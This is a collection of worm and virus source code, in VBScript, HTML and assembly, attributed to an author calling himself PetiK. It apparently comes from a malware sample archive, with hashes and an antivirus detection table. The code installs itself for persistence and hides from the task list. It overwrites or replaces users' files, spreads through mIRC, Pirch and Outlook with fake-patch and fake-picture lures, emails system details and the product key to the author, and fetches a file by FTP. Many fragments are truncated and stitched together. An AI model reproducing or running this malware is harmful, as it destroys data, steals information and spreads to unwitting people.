NUM = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
REC1 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
REC2 = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
PFD = ws.RegRead ("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PDEM = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page")
DDIR = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\Download Directory")
PAYS = ws.RegRead ("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
WINDIR = fso.GetSpecialFolder(0)
SYSDIR = fso.GetSpecialFolder(1)
TMPDIR = fso.GetSpecialFolder(2)
msg2.BCC = "petik@caramail.com;ppetik@hotmail.com"
msg2.Subject = "Message pour PetiK de " & NOM
m2 = "-Information :"
m2 = m2 & vbCrLf & "Date : " & date
m2 = m2 & vbCrLf & "Heure : " & time
m2 = m2 & vbCrLf & "NOM DE L'ORDINATEUR : " & ComputerName
m2 = m2 & vbCrLf & "ENTREPRISE : " & ENT
m2 = m2 & vbCrLf & "PAYS : " & PAYS
m2 = m2 & vbCrLf & "SYSTEME D'EXPLOITATION : " & VER & " " & NUM
m2 = m2 & vbCrLf & "NUMERO D'IDENTIFICATION : " & REC1
m2 = m2 & vbCrLf & "NUMERO D'ENREGISTREMENT : " & REC2
m2 = m2 & vbCrLf & "PAGE DE DEMARRAGE : " & PDEM
m2 = m2 & vbCrLf & "DOSSIER DE TELECHARGEMENT : " & DDIR
m2 = m2 & vbCrLf & "DOSSIER WINDOWS : " & WINDIR
m2 = m2 & vbCrLf & "DOSSIER SYSTEME : " & SYSDIR
m2 = m2 & vbCrLf & "DOSSIER TEMPORAIRE : " & TMPDIR
m2 = m2 & vbCrLf & "DOSSIER PROGRAM FILES : " & PFD
msg2.Body = m2
msg2.DeleteAfterSubmit = True
msg2.Send
Outlook.Quit
End If
ws.RegWrite "HKLM\Software\PetiK\","OK"
End Function
Function Mirc(Path)
'On Error Resume Next
If Path = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then Path = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then Path = "c:\mirc32"
PFD = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK2 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(PFD & "\mirc\mirc.ini") Then Path = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then Path = PFD & "\mirc"
End If
If Path <> "" Then
Set Script = fso.CreateTextFile(Path & "\script.ini", True)
Script.writeline "[script]"
Script.writeline "n0=on 1:JOIN:#:{"
Script.writeline "n1= /if ( $nick == $me ) { halt }"
Script.writeline "n2= /." & chr(100) & chr(99) & chr(99) & " send $nick " & PK2
Script.writeline "n3=}"
Script.Close
ws.RegWrite "HKLM\Software\PetiK\MIRC", "OK"
End If
End Function
Function Pirch(path)
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.shell")
If path = "" Then
If fso.FileExists("c:\pirch\Pirch32.exe") Then path = "c:\pirch"
If fso.FileExists("c:\pirch32\Pirch32.exe") Then path = "c:\pirch32"
pfDir = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
PK3 = ws.regread("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PetiK")
If fso.FileExists(pfDir & "\pirch\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
If fso.FileExists(pfDir & "\pirch32\Pirch32.exe") Then path = pfDir & "\pirch\Pirch32.exe"
End If
If path <> "" Then
Set Script = fso.CreateTextFile(path & "\events.ini", True)
Script.WriteLine "[Levels]"
Script.WriteLine "Enabled=1"
Script.WriteLine "Count=6"
Script.WriteLine "Level1=000-Unknowns"
Script.WriteLine "000-UnknownsEnabled=1"
Script.WriteLine "Level2=100-Level 100"
Script.WriteLine "100-Level 100Enabled=1"
Script.WriteLine "Level3=200-Level 200"
Script.WriteLine "200-Level 200Enabled=1"
Script.WriteLine "Level4=300-Level 300"
Script.WriteLine " 300-Level 300Enabled=1"
Script.WriteLine "Level5=400-Level 400 "
Script.WriteLine "400-Level 400Enabled=1"
Script.WriteLine "Level6=500-Level 500"
Script.WriteLine "500-Level 500Enabled=1"
Script.WriteLine ""
Script.WriteLine "[000-Unknowns]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[100-Level 100]"
Script.WriteLine "User1=*!*@*"
Script.WriteLine "UserCount=1"
Script.WriteLine "Event1=ON JOIN:#:/" & chr(100) & chr(99) & chr(99) & " tsend $nick " & PK3
Script.WriteLine "EventCount=1"
Script.WriteLine ""
Script.WriteLine "[200-Level 200]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[300-Level 300]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[400-Level 400]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.WriteLine ""
Script.WriteLine "[500-Level 500]"
Script.WriteLine "UserCount=0"
Script.WriteLine "EventCount=0"
Script.Close
End If
ws.RegWrite "HKLM\Software\PetiK\PIRCH", "OK"
End Function
Sub lecteur
On Error Resume Next
dim f,f1,fc
Set dr = fso.Drives
For Each d in dr
If d.DriveType=2 or d.DriveType=3 Then
liste(d.path&"\")
End If
Next
End Sub
Sub infecte(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set fc = f.Files
For Each f1 in fc
ext = fso.GetExtensionName(f1.path)
ext = lcase(ext)
if (ext="vbs") or (ext="vbe")
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
elseif (ext="js") or (ext="jse") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.Write vbscopie
ap.Close
bn=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.Copy(dossier&"\"&bn&".vbs")
fso.DeleteFile(f1.path)
elseif (ext="exe") or (ext="ini") or (ext="gif") or (ext="jpg") or (ext="htm") Then
Set cr = fso.CreateTextFile(f1.path&".vbs")
cr.Write vbscopie
cr.Close
fso.DeleteFile(f1.path)
elseif (ext="mp3") or (ext="doc") or (ext="xls") or (ext="ppt") or (ext="hlp") Then
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
Next
End Sub
Sub liste(dossier)
On Error Resume Next
Set f = fso.GetFolder(dossier)
Set sf = f.SubFolders
For Each f1 in sf
infecte(f1.path)
liste(f1.path)
Next
End Sub
File PetiK.vbs received on 05.16.2009 19:29:07 (CET)
Additional information
File size: 9766 bytes
MD5...: c9103a19fecc9f28dda136a81899d2fe
SHA1..: e06a3a4da1ce93f9005977877c85733a057da4e0
comment $ 04/02/2001 => 07/02/2001
DESCRIPTION:
Registers itself as a "Service Process", which means it is not visible in
the task list (CTRL+ALT+DEL).
Then copies itself into the SYSTEM folder under the name ie042601.exe : %SysDir%\ie042601.exe
And registers itself in the WIN.INI file :
[windows]
run=%SysDir%\ie042601.exe (where %SysDir% is the default name of the SYSTEM folder)
Creates the file SCRIPT.INI in C:\, then copies it to C:\MIRC and C:\MIRC32 and
deletes the original in C:\
Creates EMAIL.VBS in the %WinDir% directory as "read-only".
Creates WSOCK32.BAT and C:\WIN.DRV in %WinDir% as "hidden file".
The program then tries to obtain the IP address of the French-language Yahoo site
(www.yahoo.fr).
If it succeeds, it runs WSOCK32.BAT :
- Runs EMail.vbs = sends the program to every recipient in the address book.
- Downloads petik.bmp into C:\
Changes the wallpaper to the image "petik.bmp".
All BMP files in the WINDOWS directory get the hidden attribute.
TO COMPILE:
tasm32 /M /ML ie042601.asm
tlink32 -Tpe -x -aa ie042601.obj,,,import32 $
.386
jumps
locals
.model flat, stdcall
;KERNEL32.dll
extrn CreateFileA:PROC
extrn WritePrivateProfileStringA:PROC
extrn CloseHandle:PROC
extrn CopyFileA:PROC
extrn lstrcat:PROC
extrn DeleteFileA:PROC
extrn ExitProcess:PROC
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetCurrentProcessId:PROC
extrn GetModuleFileNameA:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetWindowsDirectoryA:PROC
extrn RegisterServiceProcess:PROC
extrn SetCurrentDirectoryA:PROC
extrn SetFileAttributesA:PROC
extrn Sleep:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;ADVAPI32.dll
extrn RegSetValueExA:PROC
extrn RegOpenKeyExA:PROC
extrn RegCloseKey:PROC
;WSOCK32.dll
extrn gethostbyname:PROC
;USER32.dll
extrn SystemParametersInfoA:PROC
.data
szBAT db 260 dup (0)
szInfo db 260 dup (0)
szOrig db 260 dup (0)
szVBS db 260 dup (0)
szWinini db 260 dup (0)
DIR db 260 dup (0)
FileHandle dd ?
RegHandle dd ?
SearchHandle dd ?
octets dd ?
Copie db "\ie042601.exe",00h
batfile db "\wsock32.bat",00h
vbsfile db "\EMail.vbs",00h
bmpfile db "C:\petik.bmp",00h
drvfile db "C:\Win.drv",00h
inifile db "C:\script.ini",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
Winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
yahoo db "http://www.yahoo.fr",00h
SOUS_CLE db "Control Panel\Desktop",00h
TWP_D db "TileWallpaper",00h
TWP_S db "0",00h
WPS_D db "WallpaperStyle",00h
WPS_S db "2",00h
FICHIER db "*.bmp",00h
inid: db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 260 dup (0)
db "",0dh,0ah
db "n3=}",00h
INITAILLE equ $-inid
vbsd:
db 'Dim fso,ws,file',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'EMAIL()',0dh,0ah
db 'End Sub',0dh,0ah
db 'Sub EMAIL()',0dh,0ah
db 'Set OApp=CreateObject("Outlook.Application")',0dh,0ah
db 'If OApp="Outlook" Then',0dh,0ah
db 'Set Mapi = OApp.GetNameSpace("MAPI")',0dh,0ah
db 'For Each AddList In Mapi.AddressLists',0dh,0ah
db 'If AddList.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For AddListCount = 1 To AddList.AddressEntries.Count',0dh,0ah
db 'Set AddListEntry = AddList.AddressEntries(AddListCount)',0dh,0ah
db 'Set msg = OApp.CreateItem(0)',0dh,0ah
db 'msg.To = AddListEntry.Address',0dh,0ah
db 'msg.Subject = "The last patch for Internet Explorer"',0dh,0ah
db 'm = "Date : " & date',0dh,0ah
db 'm = m & vbCrLf & "A lot of virus and worms use a bug in Internet Explorer"',0dh,0ah
db 'm = m & vbCrLf & "This patch allows you to correct this problem"',0dh,0ah
db 'm = m & vbCrLf & ""',0dh,0ah
db 'msg.Body = m',0dh,0ah
db 'msg.Attachments.Add fso.BuildPath(fso.GetSpecialFolder(1),"\ie042601.exe")',0dh,0ah
db 'If msg.To <> "" Then',0dh,0ah
db 'msg.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End if',0dh,0ah
db 'End Sub',0dh,0ah
VBSTAILLE equ $-vbsd
batd:
db "@echo off",0dh,0ah
db "if exist C:\WINDOWS\EMail.vbs start C:\WINDOWS\EMail.vbs",0dh,0ah
db "if exist C:\WINDOW\EMail.vbs start C:\WINDOW\EMail.vbs",0dh,0ah
db "if exist C:\WIN\EMail.vbs start C:\WIN\EMail.vbs",0dh,0ah
db "if exist C:\WIN95\EMail.vbs start C:\WIN95\EMail.vbs",0dh,0ah
db "if exist C:\WIN98\EMail.vbs start C:\WIN98\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.000\EMail.vbs start C:\WINDOWS.000\EMail.vbs",0dh,0ah
db "if exist C:\WINDOWS.001\EMail.vbs start C:\WINDOWS.001\EMail.vbs",0dh,0ah
db "start ftp -i -v -s:C:\Win.drv",00h
BATTAILLE equ $-batd
drvd:
db "open",0dh,0ah
db "members.aol.com",0dh,0ah
db "pentasm99",0dh,0ah
db "lcd C:\",0dh,0ah
db "bin",0dh,0ah
db "get petik.bmp",0dh,0ah
db "bye",0dh,0ah
db "exit",00h
DRVTAILLE equ $-drvd
.code
DEBUT:
CACHE: call GetCurrentProcessId ; This hides the program
push 01h ; from the task list.
push eax ; (CTRL+ALT+DEL)
call RegisterServiceProcess ;
push 02h ;
push offset WPS_D ;
push offset REG_SZ ;
push 00h ;
push offset WPS_S ;
push [RegHandle] ;
call RegSetValueExA ;
push 00h ;
call RegCloseKey ;
signature db "I-WORM.PetiK",00h
end DEBUT
File PetiK.exe received on 05.16.2009 19:29:07 (CET)
Additional information
File size: 8192 bytes
MD5...: 61ed2fc0c60eac81856e07055621b5aa
SHA1..: f172dd91c6e866ad0dfdafd9ea8d6412cf66c42e
' Name : VBS.Study
' Author : PetiK
' Language : VBS
' Date : 15/02/2001
If num = 1 Then
c.Copy(fso.GetSpecialFolder(0)&"\MyGirlfriend_NUDE.jpg.vbs")
msg.Subject = "Hi, how are you ?"
msg.Body = "Hi, look at this nice Pic attached !"
msg.Attachments.add fso.BuildPath(fso.GetSpecialFolder(0),"MyGirlfriend_NUDE.jpg.vbs")
Additional information
File size: 2033 bytes
MD5...: f41a964a3cb2ad29bcee1ce95163c7a9
SHA1..: 5b003c80a78b61e702f80e83bb77cffff4678d8b
;Bastille Virus/Worm by PetiK on 23/04/2001
.model small
.code
org 100h
DEBUT:
OUVRE_AUTO:
mov ax,3D01h
lea dx,FILE
int 21h
xchg ax,bx
xor cx,cx
mov dx,cx
mov ax,4202h
int 21h
mov cx,AUTOL
lea dx,DAUTO
mov ah,40h
int 21h
mov ah,3Eh
int 21h
COPIE_VIRUS:
mov ah,3Ch
xor cx,cx
lea dx,COPIE
int 21h
xchg ax,bx
mov ah,40h
mov cx,offset VRAIFIN - offset DEBUT
lea dx,DEBUT
int 21h
mov ah,3Eh
int 21h
mov cx,MIRCL
lea dx,DMIRC
mov ah,40h
int 21h
mov ah,3Eh
int 21h
mov ah,41h
mov dx,offset MIRCF2
int 21h
mov ah,56h
mov dx,offset MIRCF1
mov di,offset MIRCF2
int 21h
mov ah,41h
mov dx,offset MIRCF1
int 21h
DATE: mov ah,2Bh
int 21h
mov dh,7
mov dl,14
mov cx,2001
int 21h
FILE db 'C:\Autoexec.bat',00h
MIRCF1 db 'C:\script.ini',00h
MIRCF2 db 'C:\mirc\script.ini',00h
COPIE db 'C:\Win32.com',00h
WHO db 'Bastille Virus/Worm by PetiK (c)2001',00h
DAUTO: db '',0dh,0ah
db '@echo off',0dh,0ah
db 'cls',0dh,0ah
db 'echo You''re infected by Bastille Virus (c)2001',0dh,0ah
db 'echo.',0dh,0ah
db 'echo Don''t panic ! It''s not dangerous, just fatal !!',0dh,0ah
db 'pause'
AUTOL equ $-DAUTO
DMIRC db '[script]',0dh,0ah
db 'n0=on 1:start:{',0dh,0ah
db 'n1= .sreq ignore',0dh,0ah
db 'n2=}',0dh,0ah
db 'n3=on 1:connect:/rename C:\Win32.com C:\Bastille.com',0dh,0ah
db 'n4=on 1:join:#:{',0dh,0ah
db 'n5=if ($nick != $me) { dcc send $nick C:\Bastille.com }',0dh,0ah
db 'n6=}',0dh,0ah
db 'n7=on 1:disconnect:/rename C:\Bastille.com C:\Win32.com'
MIRCL equ $-DMIRC
VRAIFIN:
end DEBUT
File Bastille.com received on 05.16.2009 10:45:35 (CET)
Additional information
File size: 858 bytes
MD5...: d35715e97081f71ca4df20ad03bc0341
SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de
' Name : VBS.Starmania.A
' Author : PetiK
' Date : May 09th 2001
' Size : 4566 bytes
' Action : It copies itself to %windir%\Hwinfo.vbs and to %systemroot%\Issetup.vbs.
' It adds two values: the first in the Run key and the second in the RunServices
' key. Then it infects all *.vbs and *.vbe files in different folders:
'
' C:\WINDOWS \
' C:\WINDOWS\SYSTEM |
' C:\WINDOWS\TEMP |_
' C:\WINDOWS\SAMPLES\WSH |- All those names are the defaults
' C:\WINDOWS\DESKTOP |
' C:\MY DOCUMENTS /
' The virus adds its code at the start of the file.
'
' Afterwards it creates a script.ini file in the C:\mirc folder. When the current day is
' the 15th, the worm displays a message, changes the RegisteredOwner and
' RegisteredOrganization to "Starmania" and "PetiK Corpor@tion" and adds some values to
' display a message when the computer starts. Every day it changes the Start Page
' of Internet Explorer to one of five different addresses:
'
' http://www.symantec.com
' http://www.pandasoftware.com
' http://www.avp.ch
' http://www.cia.gov
' http://www.fbi.gov
'
' At the end, it spreads with Outlook. There are three different subjects, bodies
' and attachments:
'
'First : Subject : New Picture for you !
' Body : Look at this nice picture attached
' Attached : NewPic__Cool.jpg.vbs
'
'Second : Subject : LoveLetter Fix
' Body : Protect you against VBS.LoveLetter.Variant
' Attached : LoveFix.vbs
'
'Third : Subject : How to win a holiday in Paris
' Body : Play at this game attached and win a holiday in Paris
' Attached : Win_A_Holiday.vbs
'
'VBS.Starmania
'Coded by PetiK on 09/05/2001
'Made In France
On Error Resume Next
Dim f,w,file
Set f=CreateObject("Scripting.FileSystemObject")
Set w=CreateObject("WScript.Shell")
Set file=f.OpenTextFile(WScript.ScriptFullName,1)
vbsworm=file.ReadAll
START()
Sub START()
Set win=f.GetSpecialFolder(0)
Set sys=f.GetSpecialFolder(1)
Set cop=f.GetFile(WScript.ScriptFullName)
cop.Copy(win&"\Hwinfo.vbs")
cop.Copy(sys&"\Issetup.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Issetup")
w.RegWrite run,(win&"\Hwinfo.vbs")
w.RegWrite runs,(sys&"\Issetup.vbs")
MD=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders\Personal")
ptk(win)
ptk(sys)
ptk(f.GetSpecialFolder(2))
ptk(win&"\Samples\Wsh")
ptk(win&"\Desktop")
ptk(MD)
Worm ""
Mess()
Raffle()
Email()
End Sub
Function ptk(Folder)
If f.FolderExists(Folder) then
For each P in f.GetFolder(Folder).Files
ext=f.GetExtensionName(P.Name)
If ext="vbs" or ext="vbe" Then
Set VF=f.OpenTextFile(P.path, 1)
mark=VF.Read(14)
VF.Close
Set VF=f.OpenTextFile(P.path,2,True)
VF.Write VCd
VF.Close
End If
End If
Next
End If
End Function
Function Worm(Path)
If Path = "" Then
prgfl=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If f.FileExists("C:\mirc\mirc.ini") Then Path = "C:\mirc"
If f.FileExists(prgfl & "\mirc\mirc.ini") Then Path = prgfl & "\mirc"
If f.FileExists("C:\mirc32\mirc.ini") Then Path = "C:\mirc32"
If f.FileExists(prgfl & "\mirc32\mirc.ini") Then Path = prgfl & "\mirc32"
End If
If Path <> "" Then
Set mirc=f.CreateTextFile(Path & "\script.ini", True)
mirc.WriteLine "[script]"
mirc.WriteLine "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } "
mirc.WriteLine "n1= /dcc send $nick " & f.GetSpecialFolder(0) &"\Hwinfo.vbs"
mirc.WriteLine "n2=}"
End If
End Function
Sub Mess()
If Day(Now) = 15 Then
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StarMania","rundll32 mouse,disable"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","How are you today ? For my part, I'm fine"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","VBS.Starmania"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Starmania"
w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization","PetiK Corpor@tion"
MsgBox "Hi man, it's my new Worm/Virus. It was coded by PetiK in 2001", vbinformation, "VBS.Starmania"
End If
End Sub
Sub Raffle()
Randomize
lot=Int((5*Rnd)+1)
If lot = 1 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.symantec.com"
elseif lot = 2 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.pandasoftware.com"
elseif lot = 3 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"
elseif lot = 4 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cia.gov"
elseif lot = 5 Then
w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.fbi.gov"
End If
End Sub
Sub Email()
Set O=CreateObject("Outlook.Application")
Set mapi=O.GetNameSpace("MAPI")
For Each AL In mapi.AddressLists
If AL.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AL.AddressEntries.Count
Set ALE = AL.AddressEntries(AddListCount)
Set go = O.CreateItem(0)
go.To = ALE.Address
Randomize
num=Int((3*Rnd)+1)
Set c = f.GetFile(WScript.ScriptFullName)
If num = 1 then
c.Copy(fso.GetSpecialFolder(0)&"\NewPic__Cool.jpg.vbs")
go.Subject = "New Picture for you !"
go.Body = "Look at this nice picture attached"
go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"NewPic__Cool.jpg.vbs")
Additional information
File size: 4566 bytes
MD5...: db45536af4e9a1debccb73111fce3f3f
SHA1..: d8dfd047f7ccfba137bd3932c6495d7c0fc88d2e
<--
Name : HTML.Bother
Author : PetiK
Language : HTML/VBS
-->
<bother>
<html><head><title>Patch for Internet Explorer</title></head>
<body bgColor=#ffffff>
<font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see
this page.
<br>Please open this page again and click accept ActiveX.<br>Internet Explorer</font>
<SCRIPT Language=VBScript>
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
bureau=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
Set txt=fso.CreateTextFile(bureau&"\Hello.txt")
txt.WriteLine "HTML.Bother by PetiK (06/05/2001)"
txt.WriteLine "A HTML.Worm made in France"
txt.Close
p = Int(Rnd * 30) + 1
If Day(Now()) = p Then
WshShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\",fso.GetSpecialFolder(1)&"\SHELL32.dll,69"
End If
doc=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
Set FolderObj = FSO.GetFolder(doc)
Set FO = FolderObj.Files
For each cible in FO
ExtName = lcase(FSO.GetExtensionName(cible.Name))
if ExtName = "htm" or ExtName = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, False)
if vrai.readline <> "<bother>" Then
vrai.close()
Set vrai = fso.OpenTextFile(cible.path, 1, False)
htmorg = vrai.ReadAll()
vrai.close()
Set virus = document.body.createTextRange
Set vrai = fso.CreateTextFile(cible.path, True, False)
vrai.WriteLine "<bother>"
vrai.Write(htmorg)
vrai.WriteLine "<bother par PetiK May 9th 2001>"
vrai.WriteLine virus.htmltext
vrai.Close()
else
Real.close()
end if
end if
next
</SCRIPT>
</body>
</html>
File Bother.htm received on 05.16.2009 11:20:32 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Both!IK
AhnLab-V3 5.0.0.2 2009.05.15 HTML/Bother
AntiVir 7.9.0.168 2009.05.15 VBS/Both
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.15 VBS/Both.A
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Bother.A
BitDefender 7.2 2009.05.16 VBS.Both.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Both.A
ClamAV 0.94.1 2009.05.15 VBS.Startpage-1
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Bother
eSafe 7.0.17.0 2009.05.14 Virus.VBS.Both
eTrust-Vet 31.6.6508 2009.05.16 VBS/Both
F-Prot 4.4.4.56 2009.05.15 VBS/Both.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Both
Fortinet 3.117.0.0 2009.05.16 VBS/Both.A
GData 19 2009.05.16 VBS.Both.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Both
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Both
McAfee 5616 2009.05.15 VBS/Bother
McAfee+Artemis 5616 2009.05.15 VBS/Bother
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Both
Microsoft 1.4602 2009.05.16 Virus:VBS/SYSID
NOD32 4080 2009.05.15 VBS/Bother
Norman 6.01.05 2009.05.16 VBS/Both.K
nProtect 2009.1.8.0 2009.05.16 VBS.Both.A
Panda 10.0.0.14 2009.05.15 Univ.A
PCTools 4.4.2.0 2009.05.15 VBS.Bother.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.HTML.Both
Sophos 4.41.0 2009.05.16 VBS/Bother
Sunbelt 3.2.1858.2 2009.05.16 Virus.VBS.Both (v)
Symantec 1.4.4.12 2009.05.16 VBS.Bother.3180
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_BOTHER.A
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Both
ViRobot 2009.5.15.1737 2009.05.15 VBS.Both
VirusBuster 4.6.5.0 2009.05.15 VBS.Bother.A
Additional information
File size: 3255 bytes
MD5...: 915aaf9b61f0d62c1fc2082198b324be
SHA1..: e2bf913ffca85e796ecef0564a896625dc748332
comment #
Name : I-Worm.Friends
Author : PetiK
Date : May 13th - May 15th 2001
Action : This worm uses a VBS script and Microsoft Outlook to spread. It copies itself to
\%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe.
It creates a script file for mIRC in C:\mirc and C:\mirc32.
The first time it runs, it shows a fake WinZip message box.
The worm creates C:\Friends and creates the file maya.vbs to spread.
It changes the values : HKLM\Software\Microsoft\Windows\CurrentVersion
RegisteredOwner : Maya, Laurent, Etienne
RegisteredOrganization : PetiK Corporation
On the 5th of every month, it shows a message box.
.386
jumps
locals
.model flat,stdcall
;KERNEL32.dll
extrn WritePrivateProfileStringA:PROC
extrn lstrcat:PROC
extrn GetModuleFileNameA:PROC
extrn CopyFileA:PROC
extrn CreateDirectoryA:PROC
extrn CreateFileA:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleHandleA:PROC
extrn GetSystemDirectoryA:PROC
extrn GetSystemTime:PROC
extrn GetWindowsDirectoryA:PROC
extrn WinExec:PROC
extrn WriteFile:PROC
;USER32.dll
extrn MessageBoxA:PROC
;ADVAPI32.dll
extrn RegOpenKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
.data
szOrig db 50 dup (0)
szPTK db 50 dup (0)
szWin db 50 dup (0)
FileHandle dd ?
RegHandle dd ?
octets dd ?
winini db "\\WIN.INI",00h
run db "run",00h
windows db "windows",00h
Copie db "\Iesetup.exe",00h
inifile db "\petik",00h
script1 db "C:\mirc\script.ini",00h
script2 db "C:\mirc32\script.ini",00h
VBS db "C:\Friends\maya.vbs",00h
DIR db "C:\Friends",00h
OWN_D db "RegisteredOwner",00h
OWN_S db "Maya, Laurent, Etienne",00h
ORG_D db "RegisteredOrganization",00h
ORG_S db "PetiK Corporation",00h
SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h
TITRE db "WinZip Self-Extractor",00h
TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error",00h
TITRE2 db "I-Worm.Friends",00h
TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah
db "",0dh,0ah
db "To my friends Maya and Laurent",00h
email db "wscript C:\Friends\maya.vbs",00h
FILE_ATTRIBUTE_READONLY equ 00000001h
CREATE_NEW equ 00000001h
CREATE_ALWAYS equ 00000002h
FILE_SHARE_READ equ 00000001h
GENERIC_WRITE equ 40000000h
HKEY_LOCAL_MACHINE equ 80000002h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
wMilliseconds WORD ?
SYSTIME ends
SystemTime SYSTIME <>
petikd: db "[script]",0dh,0ah
db "n0=on 1:JOIN:#:{",0dh,0ah
db "n1= /if ( $nick == $me ) { halt }",0dh,0ah
db "n2= /.dcc send $nick "
szCopie db 50 dup (0)
db "",0dh,0ah
db "n3=}",00h
PETIKTAILLE equ $-petikd
mayad:
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe", fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah
db 'Set K = CreateObject("Outlook.Application")',0dh,0ah
